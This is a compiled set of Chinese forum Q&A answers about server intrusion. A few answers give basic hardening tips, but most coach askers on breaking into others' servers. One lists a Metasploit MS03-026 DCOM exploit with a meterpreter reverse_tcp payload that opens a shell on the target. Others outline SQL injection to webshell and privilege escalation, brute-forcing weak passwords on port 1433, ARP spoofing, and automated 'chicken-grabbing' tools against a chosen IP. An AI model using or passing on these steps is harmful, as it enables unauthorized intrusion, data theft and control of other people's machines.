1、伺服器被攻擊,黑客總是利用工具嘗試登錄我的windows系統和SQL資料庫。 求高手指點,怎樣防止這種攻擊?
一般的WINDOWS沒做安全設置時會被掃描和嘗試入侵,需要做如下的安全設置版。
1、修改WINDOWS的遠程埠號和權FTP埠號。
2、打開WINDOWS的安全防火牆,只要開80、遠程埠和FTP埠號這三個,其他的埠都關了。
3、修改帳號名和密碼,最好增加可以用的字元如「_」。
4、安裝360的防火牆(主要是因為它免費)。
5、定期看日誌如有異常及時找原因,修復安全隱患。
2、黑客是怎麼入侵伺服器的?
你伺服器老是被入侵,證明你伺服器的漏洞一直存在,所以就算你更改了密碼,還是會很快被入侵的。特別是黑客在你伺服器里種下後門後
首先你得把伺服器系統安全補丁打好。並全盤殺毒
然後再針對資料庫伺服器等應用伺服器軟體做好安全策略。
並對系統做好安全策略。修改好文件許可權。
針對網站程序做好更新,及目錄許可權。
然後裝一款好點的防火牆。
基本就這樣,說起來很簡單,做起來還是有很多步驟的。
3、入侵別人伺服器需要些什麼工具
1.用google,baidu,whois等收集情報。
2.用nmap,SuperScan等掃描。
3.系統攻擊。這個具體問題具體分析,沒什麼萬用的工具。
4.腳本攻擊。需要的工具就是代碼了(如PHP,javascript)。
5.物理入侵。混入公司內部,找出管理員,取得機房鑰匙或伺服器密碼。這個需要工具是社會工程學。
6.運氣。
Good Luck!
4、如何入侵一個伺服器
什麼學校,有這樣好的比賽,,,
如果是我,先掃描下主機漏洞。弱口令,開啟的埠服務什麼的,這個可以用X-SCAN 或流光,當然其他很多也可以,個人習慣問題,。然後針對漏洞入侵。
也可以間接的從伺服器的程序入手,加入是dvbbs,應該會有很多漏洞,現在不清楚了,。看什麼版本,。,先檢查注入漏洞。上傳漏洞,後台密碼暴力破解,等等。,不管那個漏洞。,知道後直接上傳網馬,先拿shell,然後提權,獲取伺服器管理許可權。這樣就可以直接從程序中的網馬控制伺服器的任何一個文件。更別說建立一個文檔了,。具體看什麼伺服器,什麼程序。,什麼漏洞,,,,黑客手段是千變萬化的。。。
5、我想學伺服器入侵 開始基礎學什麼·?
伺服器的入侵 主要是要懂的資料庫然後要對電腦的熟悉 入侵還是要藉助回於工具的答 1433的埠的 用字典去猜解它的 弱口令 然後進行入侵 入侵需要耐心 不能半途而廢 不然你什麼都得不到,反而會浪費很多時間
6、怎麼用cmd入侵別人伺服器
yun
大哥你好牛啊
CMD僅僅是WINDOWS進入DOS的一個命令罷了
你以為自己真的成HAKE啊
這個需要很多黑客軟體和相應的程序
做一個初級的黑客 你自己至少要精通一門計算機語言的!
7、您好,我想請教一下如何入侵windows伺服器呢???
簡單的nmap攻擊(默認伺服器開啟135埠)先用上述nmap掃描目標主機信息,然後進入命令行
msfconsole
search ms03-026-dcom
use exploit/windows/dcerpc/ms03_026_dcom/
set PAYLOAD windows/meterpreter/reverse_tcp(選擇工具)
set RHOST 192.168.1.10 //目標主機
set LHOST 192.168.1.11 //操作主機
exploit 執行命令
shell 得到目標shell,基本可以為所欲為了
8、伺服器入侵 要用到哪些軟體啊??
關於拿伺服器(基本思路:從網站「滲透」到伺服器)
一般步驟:
找對應網站注射_+點(用各種檢測方式 工具+手工)
拿到賬號和MD5加密過的密碼
破解MD5得到密碼(一般16位和32位)
找到網站後台並登錄
想辦法上傳webshell(辦法多了)
拿到webshell就提升許可權(提權)拿伺服器(辦法也很多)
success!
本人學黑約4年,所說只要你知識能力足夠,絕對能拿下!
建議你學學
網站*滲+》透
腳本~攻|+擊
SQL-注¥入
成為高手之路是十分漫長的。
9、黑客是怎麼入侵伺服器?
1、 黑客入侵攻擊的目的
(1) 認為好玩,有趣。比如有些學生。
(2) 獲取對於文件的信息。
(3) 獲取超級用戶許可權。
(4) 修改信息。
(5) 拒絕服務。
(6) 間諜人員。
(7) 網路恐怖主義。
(8) 竊取信息或者資產。
2、 實施攻擊的人員
(1) 受解僱的人員
(2) 專門的信息人員
(3) 間諜人員
3、 攻擊的方法和手段
(1) 尋找目標,獲取信息。有明確的攻擊目標。尋找有漏洞的機器,發現之後進行攻擊。即一種是先有目標,另外一種是先有工具。一般來說,如「蠕蟲事件」,更多地屬於後一種。病毒和黑客的融合,使攻擊自動化是目前比較流行的趨勢。很多問題,過去的手工病毒,要繁殖生存,通過傳播刪除數據。黑客在發現「後門」後,利用這些病毒手段進行攻擊。掃描是常用的尋找漏洞的手段。那麼,哪些服務必須提供,哪些服務不需要提供,例如用戶所不需要的某些功能服務作為選項在安裝時會存在在系統中,這樣就可能有漏洞存在在系統中。因此,如果接受的服務越多,就可能存在的問題越多。因此,不透明、經常變化、不定期升級、動態口令,使系統在變化中變得相對安全。目前,很多情況下,用戶對自己的系統中的漏洞並不了解,某些先天不合理的缺陷存在在系統中,如果有人攻擊這個弱點,就成為問題。所以,第一,要首先了解自己的系統。版本信息也是重要的,不同的版本,有不同的弱點,就可能成為攻擊對象。系統的關鍵文件也是重要的,可以從中提取用戶名和口令。
(2) 獲取系統敏感文件的方法。匿名FTP、TFTP等。採用TFTP在很多蠕蟲、強力攻擊弱口令等手段中進行使用。
(3) 獲取初始訪問許可權。如採用監聽手段竊取口令。匿名FTP,利用主機間的預設口令或信任關系(口令)等。利用發郵件,告訴你附件是個升級包,但有可能是一個病毒。利用技術防範上的漏洞。
(4) 獲取超級用戶口令。如SNIFER、緩沖區溢出等手段獲取特權。目前的開發安全理論已經引起重視。軟體工程與軟體安全已經成為一個並行的方式。軟體越龐大,漏洞越多。目前國內有人發現MICROSOFT有6個漏洞,據說這次發現之後直接就在網上公布了,但微軟還沒有找到相應的解決辦法。所以給用戶帶來很大的風險。
(5) 消除痕跡。破壞系統後使用。
(6) 慣用手法。TFTP、拒絕服務(分布式拒絕服務)、SNIFFER嗅探器、緩沖區溢出、SYN同步風暴(發出大量的連接請求,但並不管連接結果,大量佔用用戶資源,出現死機。)目前有一種技術,使系統的資源只能用到60%等。採用路由器設置提高網路質量。但是對於公共系統,路由配置拒絕服務比較難。對於路由器的攻擊,竊取許可權修改路由表,或者造成資源DOWN機。因此,要經常檢查路由器的狀態。採取措施之前,應該先記錄原始狀態參數,不要輕易地重啟技術。
--------------------------
如何預防黑客
(1) 升級系統,打補丁
(2) 防火牆
(3) 使用入侵掃描工具
(4) 不要輕易安裝不明軟體
(5) 經常檢查日誌
10、如何入侵指定ip的伺服器
SHELL,網上這樣的全自動抓雞工具很多,大家可以上網搜索,不要怕有病毒,最好是找好點的黑客網站,比如這個,
1.這里推薦大家一款全能軟體:流光,查找漏洞、埠,絕對有效果;有的PC是區域網里的,那就可以
2通過入侵區域網里的其他電腦,然後ARP欺騙,也能達到入侵的目的,區域網里的情況很多,可能有的電腦還對此電腦開
放共享等等,情況很多,這里就不多說了。
3再說說入侵伺服器IP,伺服器都是掛網站的,很多網站都是掛在一個伺服器上的,可以用旁註工具進行查找,找到網站的漏洞,像有的網站在主頁上就有網站後台的選項,網站後台的賬號和密碼都是默認的(這里提醒一下那些網管,不要了吧,呵呵。還有的網站直接就有注入點,那樣入侵就很簡單了,中國的網站防護真的是……有的伺服器好點的,網站只
掛了一個,還可能沒漏洞,伺服器本身也沒有埠弱口令漏洞,那就只能入侵區域網里的網站,再ARP了,和上面入侵PC
4區域網的方法差不多。
其實大家看完後就知道了,入侵指定IP其實就是對你抓雞技術的綜合運用的考驗,一定要認真對到每次入侵的過程,
多總結經驗,文章只是參考,轉化成自己的東西才是關鍵。